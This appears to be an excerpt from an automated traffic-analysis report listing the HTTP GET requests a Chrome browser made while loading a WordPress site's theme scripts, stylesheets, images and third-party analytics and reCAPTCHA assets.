    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/dynamic_avia/enfold.css?ver=6335ddf9ba942 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/custom.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.0.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-compat.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.0.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-compat.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/shortcodes.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/05/Cipasso_simbolo3.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/shortcodes.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/05/Cipasso_simbolo3.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
